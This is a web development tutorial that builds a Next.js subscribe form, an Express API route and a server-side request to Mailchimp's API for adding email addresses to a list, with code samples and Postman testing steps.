JavaScript's fetch()method that returns a Promise). You can prepend await to await subscribeToNewsletter({ email }) You get: onSubmit = async (e) => { e.preventDefault(); const email = (this.emailInput && this.emailInput.value) || null; if (this.emailInput && !email) { return; } try { await subscribeToNewsletter({ email }); if (this.emailInput) { this.emailInput.value = ''; } } catch (err) { console.log(err); //eslint-disable-line }}; JavaScript will pause at the line with await subscribeToNewsletter({ email }); and continue only after subscribeToNewsletter({ email }) returns a response with a success or error message. In the case of success, let’s clear our form with: if (this.emailInput) { this.emailInput.value = ''; } Before we define our NProgress.start(); to start bar loading and use NProgress.done(); to complete bar loading: onSubmit = async (e) => { e.preventDefault(); const email = (this.emailInput && this.emailInput.value) || null; if (this.emailInput && !email) { return; } NProgress.start(); try { await subscribeToNewsletter({ email }); if (this.emailInput) { this.emailInput.value = ''; } NProgress.done(); } catch (err) { console.log(err); //eslint-disable-line NProgress.done(); }}; With this change, a user who submits a form will see the progress bar. Code for your Subscribe page should look like: pages/subscribe.js import React from 'react';import Head from 'next/head';import TextField from 'material-ui/TextField';import Button from 'material-ui/Button';import NProgress from 'nprogress'; import { styleTextField } from '../components/SharedStyles';import withLayout from '../lib/withLayout';import { subscribeToNewsletter } from '../lib/api/public'; class Subscribe extends React.Component { onSubmit = async (e) => { e.preventDefault(); const email = (this.emailInput && this.emailInput.value) || null; if (this.emailInput && !email) { return; } NProgress.start(); try { await subscribeToNewsletter({ email }); if (this.emailInput) { this.emailInput.value = ''; } NProgress.done(); console.log('non-error response is received'); } catch (err) { console.log(err); //eslint-disable-line NProgress.done(); } };); Start your app with yarn dev and make sure your page and form look as expected. Submitting a form won't work yet, since we haven't defined the API method As you may have noticed from the import section of pages/subscribe.js, we will define lib/api/public.js. We placed lib folder to make it universally accessible, meaning this API method will be available on both client (browser) and server. We do so because in Next.js, page code is server-side rendered on initial load and client-side rendered on subsequent loads. In our case, when a user clicks a button on the browser to call subscribeToNewsletter() , this method will run only on the client. But imagine that you have a getPostList API method that fetches a list of blog posts. To render a page with a list of posts on the server, you have to make getPostList universally available. Back to our API method subscribeToNewsletter(). As we discussed in the introduction to this tutorial, our goal is to hook up a data exchange between client and server. In other words, our goal is to build an internal API for our app. That's why we call The purpose of subscribeToNewsletter() is to send a request to the server at a particular route called an API endpoint and then receive a response. We discuss HTTP and request/response in detail here. To understand this tutorial, you should know that a request that passes data to the server and does not require any data back is sent with the POST method. Usually, the request's body contains data (in our case, email address). In addition to sending a request, our subscribeToNewsletter() method should wait for a response. The response does not have to contain any data — it could be a simple object with one parameter { subscribed: 1 } or { done: 1 } or { success: 1 }. To achieve both sending a request and receiving a response, we use the fetch() method. In JavaScript, fetch() is a global method that is used for fetching data over a network by sending a request and receiving a response. We use the isomorphic-fetch package that makes fetch() available in our Node environment. Install this package with: yarn add isomorphic-fetch Here’s an example of usage from the package’s README: fetch('//offline-news-api.herokuapp.com/stories') .then(function(response) { if (response.status >= 400) { throw new Error("Bad response from server"); } return response.json(); }) .then(function(stories) { console.log(stories); }); Let’s use this example to write a reusable sendRequest method that takes path and some other options, passes a request object (object that has method, credentials and options properties), and calls the fetch()method. fetch() takes path and the request object as arguments: async function sendRequest(path, options = {}) { const headers = { 'Content-type': 'application/json; charset=UTF-8', }; const response = await fetch( `${ROOT_URL}${path}`, Object.assign({ method: 'POST', credentials: 'include' }, { headers }, options), ); const data = await response.json(); if (data.error) { throw new Error(data.error); } return data;} Unlike the example from isomorphic-fetch, we used our favorite async/await construct instead of Promise.then (for better code readability). Object.assign() is a method that creates a new object out of three smaller objects: { method: 'POST', credentials: 'include' }, { headers }, and options. The object options is empty by default, but it could be, for example, the request's body property. Since we need to pass an email address, our case indeed uses the body property. As you may have noticed from the code, we need to define ROOT_URL. We can write conditional logic for ROOT_URL that takes into consideration NODE_ENV and PORT, but for simplicity’s sake, we define it as: const ROOT_URL = ''; It’s time to define our sendRequest method: export const subscribeToNewsletter = ({ email }) => sendRequest('/api/v1/public/subscribe', { body: JSON.stringify({ email }), }); As you can see, we pass { body: JSON.stringify({ email }), } as an options object to add an email address to the body of the request object. Also we chose /api/v1/public/subscribe as our path, that is the API endpoint for our internal API that adds a user email address to our Mailchimp list. Put it all together and the content of the lib/api/public.js should be: lib/api/public.js import 'isomorphic-fetch'; const ROOT_URL = ''; async function sendRequest(path, options = {}) { const headers = { 'Content-type': 'application/json; charset=UTF-8', }; const response = await fetch( `${ROOT_URL}${path}`, Object.assign({ method: 'POST', credentials: 'include' }, { headers }, options), ); const data = await response.json(); if (data.error) { throw new Error(data.error); } return data;} export const subscribeToNewsletter = ({ email }) => sendRequest('/api/v1/public/subscribe', { body: JSON.stringify({ email }), }); Good job reaching this point! We defined our subscribeToNewsletter API method that sends a request to the API endpoint /api/v1/public/subscribe and receives a response. Start your app with yarn dev, add an email address, and submit the form. In your browser console ( Developer tools > Console), you will see an expect ed POST 404 error: That error means that the request was successfully sent to the server, but the server did not find what was requested. This is expected behavior since we did not write any server code that sends a response to the client when a request is sent to corresponding API endpoint. In other words, we did not create the Express route /api/v1/public/subscribe that handles the POST request we sent using the Express route/subscribe An Express route specifies a function that gets executed when an API method sends a request from the client to the route’s API endpoint. In our case, when our API method sends a request to the API endpoint /api/v1/public/subscribe, we want the server to handle this request with an Express route that executes some function. You can use the class express.Router() and syntax router.METHOD()to modularize Express routes into small groups based on user type: const router = express.Router();router.METHOD('API endpoint', ...); If you’d like to learn more, check out the official Express docs on express.Router() and router.METHOD(). However, in this tutorial, instead of modularizing, we will use: server.METHOD('API endpoint', ...); And place the above code directly into our main server code at server/app.js. You already have enough information to put together a basic Express route: - The method is POST - The API endpoint is /api/v1/public/subscribe - From writing onSubmitand - From writing onSubmit, you know about the try/catchconstruct Put all this knowledge together, and you get: server.post('/api/v1/public/subscribe', (req, res) => { try { res.json({ subscribed: 1 }); console.log('non-error response is sent'); } catch (err) { res.json({ error: err.message || err.toString() }); }}); A couple of notes: - We wrote error: err.message || err.toString()to handle both situations: when the error is a type of string and when the error is an object. - To test out our Express route, we added the line: console.log(‘non-error response is sent’); Add the above Express route to server/app.js after this line: const server = express(); It’s time to test! We recommend using the Postman app for testing out a request-response cycle. Look at this snapshot of request properties in Postman: You need to specify at least three properties (similar to when we wrote the - Select POST method - Specify the full path for the API endpoint: - Add a Content-Typeheader with the value application/json Make sure your app is running. Start it with yarn dev. Now click the Send button on Postman. If successful, you will see the following two outputs: - On Postman, you see the response has code 200 and the following body: 2. Your terminal prints: Good job, you just wrote a working Express route! At this point, you showed that two events happen successfully in your app: a request gets sent and a response is received. However, we did not pass an email address to a function inside our Express route. To do so, we need to access req.body.email, because this is where we saved the email address when defining the const email = req.body.email; With ES6 object destructuring, it becomes shorter: const { email } = req.body; If the return): if (!email) { res.json({ error: 'Email is required' }); return;} Also, modify the console.log statement to print out After these modifications, you get: server.post('/api/v1/public/subscribe', async (req, res) => { const { email } = req.body; if (!email) { res.json({ error: 'Email is required' }); return; } try { res.json({ subscribed: 1 }); console.log(email); } catch (err) { res.json({ error: err.message || err.toString() }); }}); Let’s test it out. Open Postman, and add one more property to our request: body with value team@builderbook.org. Make sure that you selected the raw > JSON data format: Make sure that your app is running and then click the Send button. Look at the response on Postman and the output of your terminal: - Postman will display - Terminal outputs an error: TypeError: Cannot read property 'email' of undefined Apparently, the req.body, you need a utility that decodes the body object of a request from Unicode to JSON format. This utility is called bodyParser, read more about it here. Install bodyParser: yarn add body-parser Import it to server/app.js with: import bodyParser from 'body-parser'; Mount JSON bodyParser on the server. Add the following line right after const server = express(); and before your Express route: server.use(bodyParser.json()); An alternative to using the external bodyParser package is to use internal Express middleware express.json(). To do so, remove the import code for bodyParser and replace the above line of code with: server.use(express.json()); We are ready to test. Make sure your app is running and click the Send button on Postman. Take a look at the response on Postman and your terminal: - Postman successfully outputs: "subscribed": 1 - Terminal has no error this time, instead it prints: team@builderbook.org Great, now the request’s body is decoded and available inside the Express route's function as req.body. You successfully added the first internal API to this app! Data exchange between client and server works as expected. Inside the Express route that we wrote earlier, we want to call and wait for a subscribe method that sends a POST request from our server to Mailchimp's. In the next and final section of this tutorial, we will discuss and write the subscribe method. Method subscribe() We wrote code for proper data exchange between our server and a user’s browser. However, to add a user’s email address to a Mailchimp list, we need to send a server to server POST request. POST request from our server to Mailchimp’s server. To send a server to server request, we will use the request package. Install it: yarn add request As with any request, we need to figure out which API endpoint and what request properties to include ( headers, body and so on): - Create a server/mailchimp.jsfile. - Import request. - Define request.post()(POST request) with these properties: uri, headers, json, body, and callback. server/mailchimp.js : import request from 'request'; export async function subscribe({ email }) { const data = { email_address: email, status: 'subscribed', }; await new Promise((resolve, reject) => { request.post( { uri: // to be discussed headers: { Accept: 'application/json', Authorization: // to be discussed, }, json: true, body: data, }, (err, response, body) => { if (err) { reject(err); } else { resolve(body); } }, ); });} All properties are self-explanatory, but we should discuss uri (or API endpoint) and Authorization header: 1. uri. Earlier in this chapter, we picked as our API endpoint. We could've picked any route for our internal API. However, Mailchimp’s API is external. Thus we should check the official documentation to find the API endpoint that adds an email address to a list. Read more about the API to add members to a list. The API endpoint is:{LIST_ID}/members Region usX is a subdomain. Follow these steps to find the subdomain for an API endpoint: - go to Account > Extras > API keys > YourAPI keys - your API key may look like xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-us17 That means the region is us17 and your app will send requests to the Mailchimp subdomain:{LIST_ID}/members Variable LIST_ID is the List ID of a particular list in your Mailchimp account. To find List ID, follow these steps: - On your Mailchimp dashboard, go to Lists > click the list name > Settings > List name anddefaults - Find the section List ID - Get the xxxxxxxxxxvalue from this section, it's your LIST_ID 2. Authorization header. We need to send our API_KEY inside Authorizationheader to Mailchimp's server. This tells Mailchimp's server that our app is authorized to send a request. Read more about Authorization header here ( headers.Authorization). Syntax for Authorization header: Authorization: - In our case: Authorization: Basic apikey:API_KEY The API_KEY must be base64 encoded. Follow this example. After encoding: Authorization: `Basic ${Buffer.from(`apikey:${API_KEY}`).toString(‘base64’)}` To find API_KEY: - On your Mailchimp dashboard, go to Account > Extras > API keys > YourAPI keys - Your API key may look like xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-us17 Where are we going to store listId and API_KEY values? You can store all environmental variable in a .env file and manage them with the dotenv package. However, to stay focused in this tutorial, we add values directly to our server/mailchimp.js file: const listId = 'xxxxxxxxxx';const API_KEY = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-us17'; Plug in the above code snippets: import request from 'request'; export async function subscribe({ email }) { const data = { email_address: email, status: 'subscribed', }; const listId = 'xxxxxxxxxx'; const API_KEY = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-us17'; await new Promise((resolve, reject) => { request.post( { uri: `{listId}/members/`, headers: { Accept: 'application/json', Authorization: `Basic ${Buffer.from(`apikey:${API_KEY}`).toString('base64')}`, }, json: true, body: data, }, (err, response, body) => { if (err) { reject(err); } else { resolve(body); } }, ); });} Remember to add real values for listId and API_KEY. Testing It’s time to test out the entire MailChimp subscription flow. We exported our subscribe method from server/mailchimp.js, but we haven't imported/added this method to the Express route at server/app.js. To do so: - Import to server/app.jswith: import { subscribe } from ‘./mailchimp’; - Add an async/awaitconstruct to the Express route, so we call and wait for the subscribemethod. Modify the following snippet of code like this: server.post('/api/v1/public/subscribe', async (req, res) => { const { email } = req.body; if (!email) { res.json({ error: 'Email is required' }); return; } try { await subscribe({ email }); res.json({ subscribed: 1 }); console.log(email); } catch (err) { res.json({ error: err.message || err.toString() }); }}); We were able to use await for subscribe because this method returns a Promise. Recall the definition of subscribe — it has a line with new Promise(). Let’s add a console.log statement to the onSubmit function from pages/subscribe.js. Open your pages/subscribe.js file and add console.log like this: try { await subscribeToNewsletter({ email }); if (this.emailInput) { this.emailInput.value = ''; } NProgress.done(); console.log('email was successfully added to Mailchimp list');} catch (err) { console.log(err); //eslint-disable-line NProgress.done();} At this point, we can skip testing with Postman. Instead, let’s start our app, fill out the form, submit the form, and check if the email was added to the Mailchimp list. Also, we will see the output of our browser console. Start your app with yarn dev. Go to. Take a look at the empty list on your Mailchimp dashboard: Fill out the form and click Subscribe. Refresh the page with the Mailchimp list: And the browser console prints: In case you are not running the app locally, you can test on the app I deployed for this tutorial:. You’ll get a test email to confirm that MailChimp API worked. Boom! You just learned two powerful skills: building internal and external APIs for your JavaScript web application. When you complete this tutorial, your code should match code in the 1-end folder. This folder is located in the tutorials directory of our builderbook repo. If you found this article useful, consider giving a star to our Github repo and checking out our book where we cover this and many other topics in detail. If you are building a software product, check out our SaaS boilerplate and Async (team communication philosophy and tool for small teams of software engineers).
https://www.freecodecamp.org/news/how-to-integrate-mailchimp-in-a-javascript-web-app-2a889fb43f6f/
CC-MAIN-2021-04
refinedweb
4,249
57.57
1.) How many types of Documents are supported by WPF ?4.) What is CustomControl WPF ? There are two types of documents supported by WPF. There are two types of documents supported by WPF. - Fixed Format Documents :- This document present content irrespective of the screen size. - Flow Format Documents:- This document is basically used to alter the contents to on the screen. 2.) What are the freezable objects in WPF ? A Freezable object is those objects which is unchangeable. The freezable objects are better and safer to shared between the threads. 3.) What is PRISM in WPF ? PRISM is a framework that is used for creating complex application for wpf ,silverlight and windows Phones. Custom Control is basically used to expand the functions of existing controls.It contains a default layout in theme and code file. 5.) Why does we use CustomControl in WPF ? Custom control is the best way to make a control library. 6.) Which tool is used to sketech a mock of your in WPF applicatiion ? SketchFlow tool 7.) What is namespace used in 3D apps in WPF ? Using System.Windows.Media.Medi3D 8.) What is the new Graphics features of WPF ? There are some new graphics of wpf. - Entirely New Text Rendering stack - Layout Rounding - ClearTypeHint -Clear Type on IRIs - Animation Easing Functions - Pixel shader 3.0 support - cached composition - Visual Scrollable AreaClip It is used to develop rapid application on window 7 Innovations such as - Multi touch - Task Bar - Ribbon - Common Dialogs - File Explorer presence and customization and more - Thumbnails toolbars - Icon Overlays - Progress bars - Jump lists There are some improvements in VisualStudioDesigner and Blend3 tool. Visual Studio Designer :- - RAD data binding - Easier auto layout - Markup extension Intellisence - More property Easier - Improvements to XAML authoring and work flow - VSM - Behaviors - Transition animations - Prototyping tool 1.) [MS-WPFXV] - wpf's file format was published [MS-WPFXV] WPF XAML vocabulary. 2.) .NET 4 has XAML Parser - It is faster. - It has more extensibility during XAML DURING xaml Reader.Load and Xaml.save BAML file format has public APIs to Read/Write. - It is suitability to use generics. - It is better preferences by name. - Canvas :- It is a specific placement. - StackPanel :- It is a specific placement or vertical stacking. - DockPanel :- It is control Docking (Explorer like) - Grid :- It is a Guideline based UI. - TextFlow :-It is a Document flow. - Navigation :- It is web like forward/like. NO 15.) How many types of Drawing objects are used in WPF ? There are four types of Drawing objects. - Geometry Drawing -> Draws a shape - Image Drawing ->Draws an image - GlyphRun Drawing->Draws Text - Drawing Group-> Draws other drawings
http://www.msdotnet.co.in/2016/01/wpf-interview-questions-and-answers.html
CC-MAIN-2019-26
refinedweb
435
60.21
Is there any page/link explaining how to use this function in JOSM? appreciate your answers, thanks asked 30 Nov '10, 00:56 Beerforfree 94●2●3●6 accept rate: 0% retagged 30 Nov '10, 11:43 katpatuka 996●15●26●36 pdfimport is very powerful tool, but requires some learning and experimenting to get to grips with. Also, unfortunately, as of now, it has virtually no documentation. Here's quick-ish guide: First, you'll need a PDF that Also you might need to tweak your JOSM setup too. pdfimport tends to use a lot of RAM, and you can run out of memory with more complex PDFs. Arrange so that your system has several gigs of RAM, and launch JOSM with "Xmx" option, like this "java -Xmx1024M -jar josm-latest.jar". You can put that command in .sh or .bat file for convenience. .sh .bat So, this is how you import PDF in separate layer in JOSM: What happens next? Most likely imported PDF data is noisy and dirty, and requires some cleaning and tagging before it's good to upload. The best way to do this is to work in separate layers--select some stuff in your PDF layer, copy it to OSM layer, then clean up tags, fix overlapping issues etc. Importer adds a bunch of tags to imported nodes and ways, these are handy for semi-automating the cleanup process. The "Search" function in "Selection" panel is your friend! answered 27 Dec '10, 23:43 cuu508 136●1●1●2 accept rate: 0% edited 28 Dec '10, 00:03 If you haven't done this yet, you have to download the plugin "pdfimport" You can do this by going to Edit - Preferences - Plugins then click on "Download List" on the bottom. After a restart of JOSM you can use the plugin by going to Tools - Import PDF File A new window opens where you can select different settings. answered 30 Nov '10, 06:27 twist3r 246●3●6●9 accept rate: 0% edited 30 Nov '10, 08:47 Could you not use a map warper program and simply use the resulting co-ordinates to make it a background image? answered 23 Jan '14, 22:43 Azzitizz 400●9●12●18 accept rate: 0% So, I've installed pdfimport with the idea using a pdf as a guiding layer to fix osm data. Not quite sure if that's what you had in mind. But... First problem: There is no "Tools - Import PDF file" Is pdfimport maintained and up-to-date? The pdf in question (5.5M): Permission to use granted at section "Maps and related data". answered 18 Jun '17, 03:15 rhardy 11●1 accept rate: 0% Found at "Imagery - More - Import PDF file". And it works. The PDF has no coordinate system, so I left the importer at the default, then found (approximately) matching nodes in the pdf and the osm data. It was about 4 meters off at the north end of the pdf, and 1 meter off at the south, which I took to be good enough. So far I came too. I tried last night to make some imports but it look like no overlap with OSM data is possible or at least I haven't been able to see both stuff together. On the other hand I came to the problem of how to geo-referencing it since I don't have the exact coordinates of both edges, so I tried first with aprox. coordinates answered 30 Nov '10, 12:51 Once you sign in you will be able to subscribe for any updates here Answers Answers and Comments Markdown Basics learn more about Markdown This is the support site for OpenStreetMap. Question tags: josm ×583 import ×187 plugin ×25 pdf ×16 question asked: 30 Nov '10, 00:56 question was seen: 14,463 times last updated: 19 Jun '17, 22:34 import image into JOSM Is it possible to autopan in JOSM? Transfer tags between building node and area Can not store imagery offset (JOSM) Video mapping plugin problem with VLC player? How do I convert shp files to GPX measurement plugin does not work JOSM pdfimport Printing fault in upgrade JOSM Can't import settings First time here? Check out the FAQ!
https://help.openstreetmap.org/questions/1677/importing-pdf-josm
CC-MAIN-2021-39
refinedweb
715
76.35
This feature is designed to allow an application composed of one or multiple actors to create a shared communication environment, often referred to as message space, within which these actors can exchange messages efficiently. In particular, supervisor and user actors of the same application can use this feature to exchange messages. Furthermore, messages may be initially allocated and sent by interrupt handlers in order to be processed later by threads. The feature is designed around the concept of message space which encapsulates within a single entity: a set of message pools shared by all actors of the application a set of message queues through which these actors exchange messages allocated from the shared message pools A message space is a temporary resource which must be explicitly created by one actor within the application. Once created, a message space may be opened by other actors within the application. Actors which have opened the same message space are said to share this message space. A message space is automatically deleted when its creating actor and all actors which opened it have exited. A message pool is defined by two parameters (message size and number of messages) provided by the application when it creates the message space. The configuration of the set of message pools defined within a message space depends upon the needs of the application. A message is an array of bytes which can be structured and used at application level through any appropriate convention. Messages are presented to actors as pointers within their address space. Messages are posted to message queues belonging to the same message space. All actors sharing a message space can allocate messages from the message pools. In the same way, all actors sharing a message space have send and receive rights on each queue of the message space. Even though most applications only need to create a single message space, the feature is designed to allow an application to create or open multiple message spaces. However, messages allocated from one message space cannot be sent to a queue of a different message space. A typical use of message spaces is as follows: The first actor, aware of the overall requirements of the application, creates the message space. Other actors of the application open the shared message space. An actor allocates a message from a message pool, and fills it with the data to be sent. The actor which allocated the message can then post it to the appropriate queue, and can assign a priority to the message. The destination actor can get the message from the queue. At this point, the message is removed from the queue. Once the destination actor has processed the message, it may free the message so that the application may allocate it again. Alternatively, the destination actor could, for example, modify the message and post it again to another queue. In order to make the service as efficient as possible, physical memory is allocated for all messages and data structures of the message space at message space creation. At message space open time, this memory is transparently mapped by the system into the actor address space. Further operations such as posting and receiving a message are done without any copy involved. Creating a message space is performed as follows: #include <mipc/chMipc.h> int msgSpaceCreate (KnMsgSpaceId spaceGid, unsigned int msgQueueNb, unsigned int msgPoolNb, const KnMsgPool* msgPools); The spaceGid parameter is a unique global identifier assigned by the application to the message space being created. This identifier is also used by other actors of the application to open the message space. Thus, this identifier serves to bind actors participating in the application to the same message space. The K_PRIVATEID predefined global identifier indicates that the message space created will be private to the invoking actor: its queues and message pools will only be accessible to threads executing within this actor. No other actor will be able to open that message space. The message space is described by the last three parameters: msqgQueueNb indicates how many queues must be created within the message space. Each queue of the message space is then designated by its index within the set of queues. This may vary from 0 to msgQueueNb - 1. msgPoolNb is the number of message pools to be created in the message space. msgPools is a pointer to an array of msgPoolNb pool descriptions. Each pool is described by a KnMsgPool data structure which includes the following information: msgSize, which defines the size of each message belonging to the pool msgNumber, which defines how many messages of msgSize bytes must be created in this pool Figure 8-1 shows an example of a message space recently created by an actor. The created message space is assigned a local identifier which is returned to the invoking actor as the return value of the msgSpaceCreate() call. The scope of this local identifier is the invoking actor. A message space may be opened by other actors through the following call: #include <mipc/chmipc.h> int msgSpaceOpen(KnMsgSpaceId spaceGid); The message space assigned with the spaceGid unique global identifier must have been previously created by a call to msgSpaceCreate(). A local identifier is returned to the invoking actor. This message space local identifier can then be used to manipulate messages and queues within the message space. Figure 8-2 shows an example of a message space recently opened by a second actor. A message may be allocated by the following call: #include <mipc/chmipc.h> int msgAllocate(int spaceLid, unsigned int poolIndex, unsigned int msgSize, KnTimeVal* waitLimit, char** msgAddr); msgAllocate() attempts to allocate a message from the appropriate pool of the message space identified by the spaceLid return value of a previous call to msgSpaceOpen() or msgSpaceCreate(). If poolIndex is not set to K_ANY_MSGPOOL, the allocated message will be the first free (not yet allocated) message of the pool defined by poolIndex, regardless of the value specified by the msgSize parameter. Otherwise, if poolIndex is set to K_ANY_MSGPOOL, the message will be allocated from the first pool for which the message size fits the requested msgSize. In this context, first pool means the one with the lowest index in the set of pools defined at message space creation time. If the pool is empty, no attempt will be made to allocate a message from another pool. If the message pool is empty (all messages have been allocated and none has been freed yet), msgAllocate() will block, waiting for a message in the pool to be freed. The invoking thread is blocked until the wait condition defined by waitLimit expires. If successful, the address of the allocated message is stored at the location defined by msgAddr. The returned address is the address of the message within the address space of the actor. Remember that a message space is mapped within the address space of the actors sharing it. However, message spaces and, as a consequence, messages themselves, may be mapped at different addresses in different actors. This is specially true for message spaces shared between supervisor and user actors. Figure 8-3 illustrates two actors allocating two messages from two different pools of the same message space. Once it has been allocated and initialized by the application, a message may be posted to a message queue with: #include <mipc/chmipc.h> int msgPut(int spaceLid, unsigned int queueIndex, char* msg, unsigned int prio); msgPut() posts the message, the address of which is msg, to the message queue queueIndex within the message space, the local identifier of which is spaceLid. The message must have been previously allocated by a call to msgAllocate(). The message will be inserted into the queue according to its priority, prio. Messages with a high priority will be taken first from the queue. Posting a message to a queue is done without any message copy, and may be done within an interrupt handler, or with preemption disabled. Figure 8-4 illustrates the previous actors posting their messages to different queues. Getting a message from a queue, if any, is achieved using: #include <mipc/chmipc.h> int msgGet(int spaceLid, unsigned int queueIndex, KnTimeVal* waitLimit, char** msgAddr, KnUniqueId* srcActor); msgGet() enables the invoking thread to get the first message with the highest priority pending behind the message queue queueIndex, within the message space whose local identifier is spaceLid. Messages with equal priority are posted and delivered in a first-in first-out order. The address of the message delivered to the invoking thread is returned at the location defined by the msgAddr parameter. If no message is pending, the invoking thread is blocked until a message is sent to the message queue, or until the time-out, if any, defined by the waitLimit parameter expires. The srcActor, if non-null, points to a location where the unique identifier of the actor (referred to as the source actor) which posted the message is to be stored. No data copy is performed to deliver the message to the invoking thread. Multiple threads can be blocked, waiting in the same message queue. At present it is not possible for one thread to wait for message arrival on multiple message queues. This type of multiplexing mechanism could be implemented at the application level using the ChorusOS event flags facility. Figure 8-5 illustrates previous actors receiving messages from queues. A message which is of no further use to the application may be returned to its pool of messages available for further allocation with the following call: #include <mipc/chMipc.h> int msgFree(int spaceLid, char* msg); Example 8-1 illustrates a very simple use of the message queue facility. Refer to the msgSpaceCreate(2K), msgSpaceOpen(2K), msgAllocate(2K), msgPut(2K), msgGet(2K), and msgFree(2K) man pages. (file: progov/msgSpace.c) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <chorus.h> #include <mipc/chMipc.h> #include <am/afexec.h> AcParam param; #define NB_MSG_POOLS 2 #define NB_MSG_QUEUES 3 #define SMALL_MSG_SZ 32 #define LARGE_MSG_SZ 256 #define NB_SMALL_MSG 13 #define NB_LARGE_MSG 4 #define SAMPLE_SPACE 1111 #define LARGE_POOL 0 #define SMALL_POOL 1 #define Q1 0 #define Q2 1 #define Q3 2 KnMsgPool samplePools[NB_MSG_POOLS]; char* tagPtr = "Spawned"; int main(int argc, char** argv, char**envp) { int res; int msgSpaceLi; char* smallMsg; char* smallReply; char* largeMsg; KnCap spawnedCap; KnActorPrivilege actorP; res = actorPrivilege(K_MYACTOR, &actorP, NULL); if (res != K_OK) { printf("Cannot get actor privilege, error %d\n", res); exit(1); } if (argc == 1) { /* * This is the first actor (or spawning actor): * Create a message space, * Spawn another actor, * Allocate, modify and post a small message on Q2 * Get a large Message from Q3, print its contents, free it * Get reply of small message on Q1, print its contents, free it. */ samplePools[LARGE_POOL].msgSize = LARGE_MSG_SZ; samplePools[LARGE_POOL].msgNumber = NB_LARGE_MSG; samplePools[SMALL_POOL].msgSize = SMALL_MSG_SZ; samplePools[SMALL_POOL].msgNumber = NB_SMALL_MSG; msgSpaceLi = msgSpaceCreate(SAMPLE_SPACE, NB_MSG_QUEUES, NB_MSG_POOLS, samplePools); if (msgSpaceLi < 0) { printf("Cannot create the message space error %d\n", msgSpaceLi); exit(1); } /* * Message Space has been created, spawn the other actor, * argv[1] set to "Spawned" to differentiate the 2 actors. */ param.acFlags = (actorP == K_SUPACTOR)? AFX_SUPERVISOR_SPACE : AFX_USER_SPACE; res = afexeclp(argv[0], &spawnedCap, ¶m , argv[0], tagPtr, NULL); if (res == -1) { printf("Cannot spawn second actor, error %d\n", errno); exit(1); } /* * Allocate a small message */ res = msgAllocate(msgSpaceLi, SMALL_POOL, SMALL_MSG_SZ, K_NOTIMEOUT, &smallMsg); if (res != K_OK) { printf("Cannot allocate a small message, error %d\n", res); exit(1); } /* * Initialize the allocated message */ strncpy(smallMsg, "Sending a small message\n", SMALL_MSG_SZ); /* * Post the allocated small message to Q2 with priority 2 */ res = msgPut(msgSpaceLi, Q2, smallMsg, 2); if (res != K_OK) { printf("Cannot post the small message to Q2, error %d\n", res); exit(1); } /* * Get a large message from Q3 and print its contents */ res = msgGet(msgSpaceLi, Q3, K_NOTIMEOUT, &largeMsg, NULL); if (res != K_OK) { printf("Cannot get the large message from Q3, error %d\n", res); exit(1); } printf("Received large message contains:\n%s\n", largeMsg); /* * Free the received large message */ res = msgFree(msgSpaceLi, largeMsg); if (res != K_OK) { printf("Cannot free the large message, error %d\n", res); exit(1); } /* * Get the reply to small message from Q1 and print its contents */ res = msgGet(msgSpaceLi, Q1, K_NOTIMEOUT, &smallReply, NULL); if (res != K_OK) { printf("Cannot get the small message reply from Q1, " "error %d\n", res); exit(1); } printf("Received small reply contains:\n%s\n", smallReply); /* * Free the received small reply */ res = msgFree(msgSpaceLi, smallReply); if (res != K_OK) { printf("Cannot free the small reply message, error %d\n", res); exit(1); } } else { /* * This is the spawned actor: * Check we have effectively been spawned * Open the message space * Allocate, initialize and post a large message to Q3 * Get a small message from Q2, print its contents * Modify it and repost it to Q1 */ int l; if ((argc != 2) || (strcmp(argv[1], tagPtr) != 0)) { printf("%s does not take any argument!\n", argv[0]); exit(1); } /* * Open the message space, using the same global identifier */ msgSpaceLi = msgSpaceOpen(SAMPLE_SPACE); if (msgSpaceLi < 0) { printf("Cannot open the message space error %d\n", msgSpaceLi); exit(1); } /* * Allocate the large message */ res = msgAllocate(msgSpaceLi, K_ANY_MSGPOOL, LARGE_MSG_SZ, K_NOTIMEOUT, &largeMsg); if (res != K_OK) { printf("Cannot allocate a large message, error %d\n", res); exit(1); } strcpy(largeMsg, "Sending a very large large large large large message\n"); /* * Post the large message to Q3 with priority 0 */ res = msgPut(msgSpaceLi, Q3, largeMsg, 0); if (res != K_OK) { printf("Cannot post the large message to Q3, error %d\n", res); exit(1); } /* * Get the small message from Q2 */ res = msgGet(msgSpaceLi, Q2, K_NOTIMEOUT, &smallMsg, NULL); if (res != K_OK) { printf("Cannot get the small message from Q2, error %d\n", res); exit(1); } printf("Spawned actor received small message containing:\n%s\n", smallMsg); for (l = 0; l < strlen(smallMsg); l++) { if ((smallMsg[l]>= 'a') && (smallMsg[l] <= 'z')) { smallMsg[l] = smallMsg[l] - 'a' + 'A'; } } /* * Post the small message back to Q1, with priority 4 */ res = msgPut(msgSpaceLi, Q1, smallMsg, 4); if (res != K_OK) { printf("Cannot post the small message reply to Q1, error %d\n", res); exit(1); } } return 0; } Two actors are used, one spawned by the other. The first actor: creates a message space with two pools of messages and three message queues as shown in the previous figure allocates a small message, initializes it and posts it to a queue waits for a large message on a second queue, prints its contents and deallocates it waits for the small message to come back on a third queue, prints its contents, deallocates it, and terminates Meanwhile, the second actor: opens the message space, allocates a large message to be initialized and sends it to the first actor receives the small message, converts all lower case characters to upper case, and posts it back to the third queue before terminating
https://docs.oracle.com/cd/E19048-01/chorus4/806-0610/6j9v18t64/index.html
CC-MAIN-2018-09
refinedweb
2,462
50.06